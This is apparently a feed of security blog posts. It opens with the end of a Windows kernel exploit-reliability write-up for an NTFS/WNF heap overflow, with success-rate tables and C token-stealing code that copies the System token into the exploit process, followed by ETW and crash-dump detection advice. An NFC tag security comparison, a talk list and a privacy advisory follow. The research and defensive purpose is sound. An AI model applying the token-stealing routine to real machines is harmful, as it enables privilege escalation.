| BSODs on exec | 14 | 16 | 19 | 13 | 17 | 16 |
| Unmapped Read | 2 | 4 | 4 | 5 | 4 | 4 |

Spray size 10000

| Result | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|---|---|---|---|---|---|---|
| SYSTEM shells | 84 | 85 | 87 | 85 | 86 | 85 |
| Total LFH writes | 805 | 714 | 761 | 688 | 694 | 732 |
| Avg LFH writes | 9 | 8 | 8 | 8 | 8 | 8 |
| Failed after 32 | 3 | 5 | 3 | 3 | 3 | 3 |
| BSODs on exec | 13 | 10 | 10 | 12 | 11 | 11 |
| Unmapped Read | 1 | 0 | 1 | 1 | 0 | 1 |

Spray size 20000

| Result | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|---|---|---|---|---|---|---|
| SYSTEM shells | 89 | 90 | 94 | 90 | 90 | 91 |
| Total LFH writes | 624 | 763 | 657 | 762 | 650 | 691 |
| Avg LFH writes | 7 | 8 | 7 | 8 | 7 | 7 |
| Failed after 32 | 3 | 2 | 1 | 2 | 2 | 2 |
| BSODs on exec | 8 | 8 | 5 | 8 | 8 | 7 |
| Unmapped Read | 0 | 0 | 0 | 0 | 1 | 0 |

From this we can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to a page not being mapped) and thus reduces the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post-exploitation method used (token stealing vs modifying the existing token). The reason for this is that the token stealing method requires more kernel reads/writes and leaves a longer duration before PreviousMode is reverted.
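For reference, a minimal sketch of the token stealing variant used for this comparison is shown below, built on the same read64/write64 primitives. The _EPROCESS offsets (UniqueProcessId at 0x440, ActiveProcessLinks at 0x448, Token at 0x4b8) are assumptions for the Windows 10 20H2 build tested and should be checked with dt nt!_EPROCESS; CurrentEprocess is a hypothetical variable holding the previously leaked _EPROCESS address of the exploit process.

```
// Assumed _EPROCESS offsets for the build under test.
#define EPROCESS_PID_OFFSET    0x440
#define EPROCESS_LINKS_OFFSET  0x448
#define EPROCESS_TOKEN_OFFSET  0x4b8

void StealSystemToken(char* CurrentEprocess)
{
    char* start = CurrentEprocess + EPROCESS_LINKS_OFFSET;
    char* entry = start;

    // Walk ActiveProcessLinks until the System process (PID 4) is found.
    do
    {
        entry = (char*)read64(entry);                           // Flink
        char* eprocess = entry - EPROCESS_LINKS_OFFSET;

        if ((QWORD)read64(eprocess + EPROCESS_PID_OFFSET) == 4)
        {
            // Overwrite our Token (including the fast-reference bits) with the
            // System process token pointer.
            QWORD SystemToken = (QWORD)read64(eprocess + EPROCESS_TOKEN_OFFSET);
            write64(CurrentEprocess + EPROCESS_TOKEN_OFFSET, SystemToken);
            return;
        }
    } while (entry != start);
}
```

The modified-token variant instead flips the enabled bits within _SEP_TOKEN_PRIVILEGES in the process’s existing token, which needs fewer kernel writes.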

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

| Result | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|---|---|---|---|---|---|---|
| PRIV shells | 94 | 92 | 93 | 92 | 89 | 92 |
| Total LFH writes | 939 | 825 | 825 | 788 | 724 | 820 |
| Avg LFH writes | 9 | 8 | 8 | 8 | 8 | 8 |
| Failed after 32 | 2 | 2 | 1 | 2 | 0 | 1 |
| BSODs on exec | 4 | 6 | 6 | 6 | 11 | 6 |
| Unmapped Read | 0 | 1 | 1 | 2 | 2 | 1 |

Therefore, there is only a negligible difference between these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well, firstly, there has been a patch available for this vulnerability since the 8th of June 2021. If you’re reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this work and from detecting memory corruption exploits in the wild in general. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post-exploitation technique detection (token stealing etc.) which has been covered in many online articles. As I never had access to the in-the-wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should give security researchers a greater understanding of this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray)
  • Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:
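As a rough illustration (and not the exact trace configuration used for the capture above), the sketch below starts an ETW session from C and enables the Microsoft-Windows-Kernel-File provider. The provider GUID shown is the value commonly documented for this provider, but treat it as an assumption and confirm it locally with logman query providers "Microsoft-Windows-Kernel-File"; the session must be started from an elevated context and the code linked against advapi32.

```
#include <windows.h>
#include <wmistr.h>
#include <evntrace.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Assumed GUID for Microsoft-Windows-Kernel-File - verify before relying on it.
static const GUID KernelFileProvider =
    { 0xEDD08927, 0x9CC4, 0x4E65, { 0xB9, 0x70, 0xC2, 0x56, 0x0F, 0xB5, 0xC2, 0x89 } };

int main(void)
{
    WCHAR sessionName[] = L"NtfsEaTrace";
    WCHAR logFile[]     = L"C:\\traces\\ntfs_ea.etl";

    // The properties buffer holds the structure plus the session and file names.
    ULONG bufSize = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(sessionName) + sizeof(logFile);
    EVENT_TRACE_PROPERTIES* props = (EVENT_TRACE_PROPERTIES*)calloc(1, bufSize);

    props->Wnode.BufferSize    = bufSize;
    props->Wnode.Flags         = WNODE_FLAG_TRACED_GUID;
    props->Wnode.ClientContext = 1;                       // QPC timestamps
    props->LogFileMode         = EVENT_TRACE_FILE_MODE_SEQUENTIAL;
    props->LoggerNameOffset    = sizeof(EVENT_TRACE_PROPERTIES);
    props->LogFileNameOffset   = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(sessionName);
    memcpy((char*)props + props->LogFileNameOffset, logFile, sizeof(logFile));

    TRACEHANDLE hSession = 0;
    ULONG status = StartTraceW(&hSession, sessionName, props);
    if (status != ERROR_SUCCESS) { printf("StartTrace failed: %lu\n", status); return 1; }

    // Keywords/levels left wide open here; they can be narrowed down to just the
    // events carrying the SetEa/QueryEa operations.
    status = EnableTraceEx2(hSession, &KernelFileProvider,
                            EVENT_CONTROL_CODE_ENABLE_PROVIDER,
                            TRACE_LEVEL_INFORMATION, 0, 0, 0, NULL);
    if (status != ERROR_SUCCESS) { printf("EnableTraceEx2 failed: %lu\n", status); return 1; }

    printf("Tracing to %ws - press Enter to stop.\n", logFile);
    getchar();

    ControlTraceW(hSession, sessionName, props, EVENT_TRACE_CONTROL_STOP);
    free(props);
    return 0;
}
```

An equivalent session can also be created with built-in tooling such as wpr or logman; the point is simply that the Ea events are available to any ETW consumer for correlation with the process that issued them.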

As this vulnerability can be exploited at low integrity (and thus from a sandbox), the detection mechanisms would vary based on whether an attacker had local code execution or had chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser renderer process performing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome did not trigger either of the events while loading a new tab and web page. I didn’t explore too deeply whether there are any renderer operations which could trigger these events non-maliciously, but this provides an area defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.

Crash Dump Telemetry

Crash Dumps are a very good way to detect unreliable exploitation techniques or if an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. This was found by looking for shellcode, however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes too.

In the case of this specific vulnerability being exploited via WNF, there is a slim chance (approx. <5%) that the following BSOD can occur, which could act as a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem, so this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution. Once kernel code execution or SYSTEM has been gained, however, an attacker may simply disable the telemetry or sanitise it afterwards – especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios where this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more successful and less likely to cause instability on the target system than a simple POC. However, we can only achieve roughly a ~90% success rate due to the techniques used. This seems to be about the limit with this approach and without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and to detect memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

The ABCs of NFC chip security

30 August 2021 at 23:00

tl;dr

NFC tags are becoming increasingly more common in everyday use cases such as: 

  • Public spaces like museums, art galleries or even retail stores in order to provide additional information about an item or product. 
  • Inventory management sites use NFC tags on product packaging to update information on its contents. 
  • Industrial facilities can use NFC for sharing initial secrets needed for device or service provisioning scenarios and also to deploy configuration data in operational mode (e.g. Amazon Monitron). 
  • Numerous other use cases such as factory and home automation, industrial and street lighting, security systems, metering, healthcare, and wellness. Some real-life examples are the IRISS E Sentry Connect used to track electrical equipment inspection and maintenance history, McLear RingPay used for contactless payments, or the Oura ring used for healthcare and wellness tracking. 

When looking into guidance on securely configuring NFC tags, a well-documented resource detailing how to securely configure a specific NFC tag chip was not readily available. The only available solution was to search every manufacturer’s datasheet and documentation in order to identify the security-related information. NCC Group aims to solve this documentation deficiency in this blog post by presenting an overview of security features that are available in the most common NFC tag models on the market, and to provide a side-by-side comparison. 

NFC Tag Standards and Specifications

The NFC technology stack is rather complex, as there are several available standards and specifications that define NFC tag feature support. Generally, security features in NFC chips will correlate to commands that are supported by each chip.  

The following table maps the features provided by each standard to the NFC protocol stack, which illustrates the complexity of the NFC ecosystem.  

https://en.wikipedia.org/wiki/Near-field_communication#/media/File:NFC_Protocol_Stack.png

The complexity of the NFC ecosystem is illustrated by the previous chart. Perhaps the most surprising thing about the diagram above is not even that different standards exist at different layers of the NFC stack, but that even at a given layer of the stack, there are multiple competing standards which often fail to align. This complex ecosystem has resulted in inconsistencies in users’ security expectations – and security engineering methodologies – when deploying NFC.  
 
For example, above, the ISO International standards are mainly involved in defining the specifications at the physical and RF layers, but as we go up in the protocol stack, we encounter the different manufacturer contributions. For example, the ST25TA64K chip supports three command families:  

  • The NFC Forum Type 4 Tag command set 
  • The ISO/IEC 7816-4 command set 
  • The ST proprietary command set 

Further illustrating the degree of complexity, in order to enable the Read Only permanent state for an NDEF file in this same ST chip, commands from all three supported families are required. The following RF commands need to be used, in this precise order: 

  1. NDEF Tag Application Select (NFC Forum Type 4 Tag command set) 
  2. NDEF select File: Selects the NDEF file (NFC Forum Type 4 Tag command set) 
  3. Verify command: Checks the access rights of an NDEF file or sends a password (ISO/IEC 7816-4 command set) 
  4. NDEF select File: Selects the NDEF file (NFC Forum Type 4 Tag command set) 
  5. EnablePermanentState command: Enables the Read Only or Write Only security state (ST proprietary command set) 

From this we can see that it is clear that there are several standards defining the NFC protocol stack, and so any tool looking to provide support for configuring NFC tag security features will need to support more than one standard. This is one of the primary reasons why tooling support and security best practice documentation in the NFC ecosystem is woefully lacking. 
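To make the above concrete, here is a hedged sketch, in C over the Windows PC/SC API (winscard, linked against winscard.lib), of issuing such a mixed-command-set sequence to a tag through a contactless reader. Only the NDEF Tag Application AID (D2760000850101) is the standard NFC Forum Type 4 value; the NDEF file ID, the Verify password bytes and the EnablePermanentState APDU are placeholders which must be taken from the ST25TA datasheet and are not values confirmed by this post.

```
#include <windows.h>
#include <winscard.h>
#include <stdio.h>

// Sends one APDU and prints the status word; error handling kept minimal.
static void xmit(SCARDHANDLE card, const BYTE* apdu, DWORD len)
{
    BYTE  resp[258];
    DWORD respLen = sizeof(resp);

    if (SCardTransmit(card, SCARD_PCI_T1, apdu, len, NULL, resp, &respLen) == SCARD_S_SUCCESS
        && respLen >= 2)
        printf("SW: %02X%02X\n", resp[respLen - 2], resp[respLen - 1]);
}

int main(void)
{
    SCARDCONTEXT ctx;
    SCARDHANDLE  card;
    DWORD        proto;
    char         readers[1024];
    DWORD        len = sizeof(readers);

    SCardEstablishContext(SCARD_SCOPE_USER, NULL, NULL, &ctx);
    SCardListReadersA(ctx, NULL, readers, &len);          // use the first reader found
    SCardConnectA(ctx, readers, SCARD_SHARE_SHARED, SCARD_PROTOCOL_T1, &card, &proto);

    // 1. NDEF Tag Application Select (NFC Forum Type 4 Tag command set)
    BYTE selApp[]  = { 0x00, 0xA4, 0x04, 0x00, 0x07,
                       0xD2, 0x76, 0x00, 0x00, 0x85, 0x01, 0x01, 0x00 };
    // 2./4. NDEF file select - the 0x0001 file ID is a placeholder, read it from the CC file
    BYTE selNdef[] = { 0x00, 0xA4, 0x00, 0x0C, 0x02, 0x00, 0x01 };
    // 3. Verify (ISO/IEC 7816-4) - P2 and password bytes are placeholders from the datasheet
    BYTE verify[]  = { 0x00, 0x20, 0x00, 0x01, 0x00 };
    // 5. EnablePermanentState (ST proprietary) - CLA/INS/P1/P2 are placeholders from the datasheet
    BYTE enPerm[]  = { 0x00, 0x28, 0x00, 0x01 };

    xmit(card, selApp,  sizeof(selApp));
    xmit(card, selNdef, sizeof(selNdef));
    xmit(card, verify,  sizeof(verify));
    xmit(card, selNdef, sizeof(selNdef));
    xmit(card, enPerm,  sizeof(enPerm));

    SCardDisconnect(card, SCARD_LEAVE_CARD);
    SCardReleaseContext(ctx);
    return 0;
}
```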

Available Security Options

To illustrate an important concept within NFC security – namely, that of “user” and “system” specific memory protections – we share an example in the following image which describes the block architecture of the ST25TA64K tag from STMicroelectronics. Note below the presence of both User and System memory areas, which exist within different regions of a 64-Kbit EEPROM internal to the NFC chip. 

The NFC specification defines important security features for these two memory areas. For each chip surveyed, two main types of security features were observed:  

  • User memory protection: User memory is where customer data, such as NDEF records (https://w3c.github.io/web-nfc/#dfn-ndef-record), would be stored. The NFC Data Exchange Format (NDEF) is a data format that can be used to exchange information (NDEF records) between any compatible NFC device and another NFC device or tag.  
  • System configuration protection: This is where system configuration data would be stored, such as the passwords used for user memory area protection.  

User memory and system configuration are generally stored in different memory areas within the NFC chip, and are accessed via different commands. For both user memory and system configuration protection, the following configuration parameters are available: 

  • Read Protection (RDP): Protection via a password for read operations. 
  • Write Protection (WDP): Protection via a password for write operations. 
  • Permanent Lock: Prevent the contents from modifications (Write operations). 

The implementation of these protections, as well as additional protections some chips might offer are compiled in the following section. 

Comparison

A selection of NFC tags surveyed during this research

The tags used for this comparison were chosen based on their public availability and the features offered, and are listed hereafter. The astute reader will notice some duplication below, and that is due to the fact that some vendors sell NFC tags that use another vendor’s NFC chip. 

  • STMicroelectronics ST25TA02K 
  • STMicroelectronics ST25TA64K 
  • STMicroelectronics ST25DV Series 
  • Adafruit 4032 (NXP NTAG213) 
  • Adafruit 4033 (NXP NTAG213) 
  • Adafruit 4034 (NXP NTAG213) 
  • DFRobot FIT0313 (NXP NXPS50) 
  • Murata Electronics LXMS33HCNG-134 (NXP ICODE SLIX) 
  • Avery Dennison RFID 600560 (NXP UCODE 7) 
  • Avery Dennison RFID 600600 (Impinj Monza R6) 
  • SparkFun Electronics WRL-14151 (EPCglobal Gen2) 
  • Abracon LLC ART915X250903AM-IC (Alien H3 RFID) 

Understanding the security impact of NFC chips’ range & frequency

NFC solutions have evolved over time to support higher RF frequencies, and as a consequence they can be interacted with from longer distances, including by attackers. The advertised ranges for UHF chips are close to early Bluetooth ranges and would no longer even require an attacker to physically tap the tag. Additionally, the advertised applications have been expanding more and more into safety-critical areas, such as the oil and gas industry, as well as military devices and vehicles. It is thus important to know how to choose the appropriate chips for a given use case, and how to configure them securely. 

Understanding the security impact of NFC chips’ memory protections

For a strong security posture, it is important for the chosen chip to support as many protections as possible. Having these protections enabled by default, even with easily guessable passwords, may protect the contents of the chip from some opportunistic threat actors, improving the security stance. However, this will not provide any protection against a more persistent or even mildly sophisticated attack. It is thus important to enable the security protections and configure secure passwords as part of the NFC chip provisioning process, before the chips are deployed in the wild. Depending on the chip and management needs, a chip can be permanently locked to prevent write actions over RF if there is a secondary channel to perform this action, such as I2C (e.g. ST25DV), or if the contents are never expected to change. 

In the following table we enumerate all of the surveyed NFC chips, whether read (RDP) and write (WDP) user memory protections are available, whether the default chip configuration enables or disables RDP and WDP, and whether the chips support Permanent Lock functionality. Although some chips had detailed publicly available documentation, for other chips the data sheets and reference manuals were only available under NDA. All chips have public documentation of their security features, except for the Alien H3, which required an NDA, and the NXPS50 and SparkFun EPCglobal, which list the security features but do not document their default configuration. For those chips whose documentation was locked behind an NDA, we have filled in the corresponding values as “Unknown”. Only publicly available information has been used in this post; no information requiring an NDA. 

Chip  RDP/ Default  WDP/ Default  RDP Default PWD  WDP Default PWD  Perm. Lock/ Default 
ST25TA02K  Y / N  Y / N  0x00 (128-bit)  0x00 (128-bit)  Y / N 
ST25TA64K  Y / N  Y / N  0x00 (128-bit)  0x00 (128-bit)  Y / N 
ST25DV Series  Y / N  Y / N  0x00 (64-bit)  0x00 (64-bit)  Y / N1 
NXP NTAG213  Y / N  Y / N  PWD: 0xFF (32-bit)  PWD: 0xFF (32-bit)  Y / N 2 3  
NXPS50  Y / Unknown  Y /  Unknown   Unknown    Unknown    Unknown  
NXP ICODE SLIX  Y / N  0x00 (32-bit)  Y / N 
NXP UCODE 74  Y / Y  Y / Y  0x00 (32-bit) 5  0x00 (32-bit) 5  Y / N 
Impinj Monza R64 6  0x00 (32-bit)  0x00 (32-bit)  Y / N 
EPCglobal Gen2  Y /  Unknown  Y /  Unknown   Unknown    Unknown    Unknown  
Alien H3 RFID  Y / Unknown   Y / Unknown    Unknown    Unknown  Y / Unknown  
User memory protection and default values 

The following table documents whether read (RDP) and write (WDP) system configuration protection is available for each of the reviewed chips, as well as the default configuration and whether they support Permanent Lock capabilities. 

Chip  RDP/ Default  WDP/ Default  RDP Default PWD  WDP Default PWD  Perm. Lock/ Default 
ST25TA02K  N / N  N / N  Not Applicable  Not Applicable  Partial/N 11 
ST25TA64K  N / N  N / N  Not Applicable  Not Applicable  Partial/N 11 
ST25DV Series  Y / N  Y / N  0x00 (64-bit)  0x00 (64-bit)  Y / N1 
NXP NTAG213  Y / N  Y / N  PWD: 0xFF (32-bit)  PWD: 0xFF (32-bit)  Partial / N 2 3 7 
NXPS50  Y / Unknown   Y / Unknown   Unknown   Unknown   Unknown  
NXP ICODE SLIX  Y / N8  0x00 (32-bit)  Partial / N9 
NXP UCODE 710  Y / N  Y / N  0x00 (32-bit) 5  0x00 (32-bit) 5  Y / N 
Impinj Monza R66  0x00 (32-bit)  0x00 (32-bit)  Y / N 
EPCglobal Gen2  Y / Unknown  Y / Unknown   Unknown   Unknown   Unknown  
Alien H3 RFID10  Y / Unknown   Y / Unknown   Unknown   Unknown   Y / Unknown  
System configuration protections and Default values 

Conclusion

Despite the many standards available defining NFC, in reality the support, definition and implementation of security features for NFC tags can vary quite a lot depending on the chip manufacturer as well as the tag vendor. Additionally, some tags don’t support read/write protections, and most tags are delivered to end users with an insecure default configuration, such as default protection passwords that are easily guessable (all 0s). Moreover, many tags have no information in their public documentation about the default configuration. 

Thus, depending on the application intended for the NFC tags, it is important to ensure that  the chip can fulfill the security expectations of the product threat model. For example, if the tags are to be installed in public areas such as libraries or supermarkets, then a manufacturing or provisioning process should be defined in order to lock down the memory contents. 

The average user will tend to trust the businesses that deploy NFC tags and will scan them in order to view content, which could expose their own mobile devices to further attacks. If these tags are deployed in the default insecure configuration, a malicious actor could re-write the tag with malicious content, such as a link to a phishing website, or an NDEF record that redirects the user to install a malicious application on their phone. Some examples of attacks are: malware installation via Android Beam, or redirecting the user to install a Play Store application by writing to the tag an Android Application Record (AAR) NDEF record referencing a malicious application. The latter will instruct the mobile device that the malicious Android application should be used to handle the NFC tag and open the application’s Play Store page, guiding the user to install it. Attackers could go as far as locking down the tag memory, so that the company could not restore the tags and would have to deploy new ones. This type of attack does not target a user’s mobile device security, but instead impacts the trust the user has when scanning a tag provided by the business or organization. 

Therefore the consequences of insecure deployment of NFC are not limited just to the affected users and their devices – they can also affect businesses in terms of both their reputation as perceived by their customers and suppliers, and their ability to reliably use NFC deployments in their ongoing operations. 

Endnotes

1 The system configuration can be permanently locked for write access from RF, but an I2C host will still be able to edit and unlock: “user cannot unlock system configuration if LOCK_CFG=01h, even after opening RF configuration security session (only I2C host can unlock system configuration).” (https://www.st.com/resource/en/datasheet/st25dv04k.pdf

2 The documentation mentions : “CFGLCK: user configuration permanently locked against write access, except PWD […]” and “The PWD  [… is] writable even if the CFGLCK bit is set to 1b.“, which means the two passwords can still be modified, despite the memory being permanently locked. (https://www.nxp.com/docs/en/data-sheet/NTAG213_215_216.pdf

3 Additional protection in the case of too many unsuccessful authentication attempts : “As soon as this internal counter reaches the number specified in AUTHLIM, any further negative password verification leads to a permanent locking of the protected part of the memory for the specified access modes.” (https://www.nxp.com/docs/en/data-sheet/NTAG213_215_216.pdf

4 The tag does not have user memory per-se, the inventory data is stored in the EPC memory section, for this comparison we consider this area as “user memory” as this would be the data returned to a user when reading the tag. 

5 If a Tag does not implement the kill and/or access password(s), the Tag shall logically operate as though it has zero-valued password(s) that are permanently read/write locked” (https://www.gs1.org/sites/default/files/docs/epc/uhfc1g2_1_2_0-standard-20080511.pdf

6 Monza R6 does not have any user programmable passwords. As per the Gen2 specifications the passwords are PermaReadLocked and set to zero. It follows that Monza R6 is not killable and does not utilize the Access command.” (https://support.impinj.com/hc/article_attachments/1500019253582/Impinj_Monza_R6_Tag_Chip_Datasheet_V7_20210521.pdf

7 The documentation suggests that only the first two configuration pages can be permanently locked: “Remark: The CFGLCK bit activates the permanent write protection of the first two configuration pages. The write lock is only activated after a power cycle of NTAG21x. If write protection is enabled, each write attempt leads to a NAK response.” (https://www.nxp.com/docs/en/data-sheet/NTAG213_215_216.pdf

8 Only for EAS and AFI functionality: “Password (32-bit) protected EAS and AFI functionality” (https://www.nxp.com/docs/en/data-sheet/SL2S2002_SL2S2102.pdf

9 Only available for specific configuration areas: “Lock mechanism for DSFID, AFI, EAS” (https://www.nxp.com/docs/en/data-sheet/SL2S2002_SL2S2102.pdf

10 An additional security feature from the EPC standard, a tag can be “killed” : “The kill password is a 32-bit value stored in Reserved memory 00h to 1Fh, MSB first. The default (unprogrammed) value shall be zero. An Interrogator may use the kill password to (1) recommission a Tag, and/or (2) kill a Tag and render it nonresponsive thereafter. A Tag shall not execute a recommissioning or kill operation if its kill password is zero. A Tag that does not implement a kill password operates as if it has a zero-valued kill password that is permanently read/write locked.” (https://www.gs1.org/sites/default/files/docs/epc/uhfc1g2_1_2_0-standard-20080511.pdf

11 Only for the GPO Config and Event Counter Config bytes (https://www.st.com/resource/en/datasheet/st25ta02k-p.pdf

Conference Talks – September 2021

31 August 2021 at 09:00

This month, members of NCC Group will be presenting their work at the following conferences:

  • Javed Samuel, “Overview of Open-Source Cryptography Vulnerabilities”, to be presented at the International Cryptographic Module Conference 2021 (Virtual – Sept 3 2021)
  • Robert Seacord, “Secure Coding”, to be presented at Auto ISAC Analysts (Virtual – Sept 7 2021)
  • Erik Steringer, “Automating AWS Privilege Escalation Risk Detection With Principal Mapper”, to be presented at fwd:CloudSec (Salt Lake City Utah Sept 13-14 2021)
  • Duane Reeves, “Telephony: The Forgotten Network Threat”, to be presented at GSX 2021 (Orlando Florida Sept 27 2021)

Please join us!

Overview of Open-Source Cryptography Vulnerabilities
Javed Samuel
ICMC21 – Bethesda, Maryland
September 3 2021

This talk will review the foundations of cryptographic vulnerabilities as applicable to open-source software from a penetration tester’s perspective over multiple public cryptography audit reports. It will discuss what attacks in the past took advantage of these cryptography vulnerabilities and what the consequences were. The talk will also examine ways that open-source software has been updated over time to mitigate these cryptography flaws and how successful these mitigations may have been. Finally, some thoughts on possible areas that could be the focus for future cryptography vulnerabilities in open-source applications will be presented. 

Secure Coding
Robert Seacord
Auto ISAC Analysts – Virtual
September 7 2021

Secure coding is essential to the development of secure, connected vehicles. Current safety guidelines such as MISRA are deficient from a security perspective. This talk will provide an overview of secure coding and some of the problems it solves that are not adequately addressed by MISRA. It will provide an explanation of common programming errors in C and C++ and describe how these errors can lead to code that is vulnerable to exploitation. It will concentrate on security issues intrinsic to the C and C++ programming languages and associated libraries.

Automating AWS Privilege Escalation Risk Detection With Principal Mapper
Erik Steringer
fwd: Cloud Sec – Salt Lake City, Utah
September 13-14 2021

You locked down your AWS account’s IAM Policies, but are you certain there aren’t any unexpected side effects? Are there any passable/assumable roles that could be abused to access those credentials you stashed in Secrets Manager? Principal Mapper (PMapper) is a tool for in-depth evaluation of AWS IAM Authorization Risks. This talk covers how to extend it to automate finding risks (continuous monitoring) and test for resource isolation.

Telephony: The Forgotten Network Threat
Duane Reeves
GSX 2021- Orlando Florida
September 27 2021

Telecommunications networks are now relied upon more than ever before, making them a staple of modern society’s critical infrastructure. Unfortunately, fraud and security threats are arising alongside the technological advancements by today’s unified communications (UC) systems. The Communications Fraud Control Association (CFCA), in its 2019 annual survey, announced that global yearly fraud losses are in the range of $28–$30 billion. What does telephony look like today, and how have UC networks made fraudulent activities easier, cheaper, and available to more people? In this session, I will address those questions, explore the various risks organizations face, and detail important steps to identify countermeasures to protect against the multiple threats.

Technical Advisory – New York State Excelsior Pass Vaccine Passport Scanner App Sends Data to a Third Party not Specified in Privacy Policy

1 September 2021 at 19:00
Vendor: New York State
Vendor URL: https://covid19vaccine.health.ny.gov/excelsior-pass
Versions affected: iOS 1.4.1, Android 1.4.1
Systems Affected: iOS, Android
Author: Dan Hastings dan.hastings[at]nccgroup[dot]trust
Advisory URL / CVE Identifier:
Risk: Information Leakage

Summary

The New York State (NYS) Excelsior scanner app is used by businesses or event venues to scan the QR codes contained in the NYS Excelsior wallet app to verify that an individual has either a negative COVID-19 test or their vaccination status. We have found that some data about the businesses/event venues using the app to scan QR codes is also sent to a third-party analytics domain, but that this was not specified in the app’s privacy policy.

Impact

The NYS scanner app’s privacy policy does not match up to the actual data collection practices of the application, resulting in data being sent to an analytics third party that was not specified in advance to users of this app.

Details

The NYS Excelsior scanner privacy policy (https://epass.ny.gov/privacy-scanner) describes that the Business Name, Industry Type and Zip Code are all collected by the scanner app. The policy also states in the “How Data is Used” clause that “App data, including Business Name, Industry Type, Zip Code, Pass type (vaccination, PCR, antigen), and Scan Result (valid, invalid, expired, pass not found), is collected and stored securely and is only shared with NYS”. 

In a request to the domain https://app-measurement.com (which is used for Google Analytics) the Business Name, Industry Type and Zip Code of the business/event venue using the scanner are all sent, which was not specified in the app’s privacy policy.

Fix from Vendor

Vendor informed NCC Group that updates will be made to the privacy policy to clarify that Business Name, Industry Type and Zip Code data will be shared with third parties.

Recommendation to Scanner App Users

Update to the latest version of the application.

Vendor Communication

2021-04-30 Starts disclosure to NYS via support form - no response
2021-06-07 Submits another request to coordinate a disclosure - no response
2021-06-10 Calls NYS Excelsior support and is instructed to wait or contact the Department of Health 
2021-06-17 Emails DOH requesting to start disclosure process - no response
2021-06-25 Emails DOH to follow up on previous email - no response
2021-07-08 Emails DOH and requests acknowledgment - no response 
2021-07-16 Emails NYS ITS Cyber command center requesting to start a disclosure 
2021-07-20 ITS sets up meeting to discuss vulnerabilities
2021-07-21 Meets with ITS team and shares vulnerabilities and recommends fixes
2021-07-21 ITS sends email with patch details and date 
2021-08-12 Patch released
2021-09-01 Advisory publication 

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: 2021-09-01

Written by: Dan Hastings

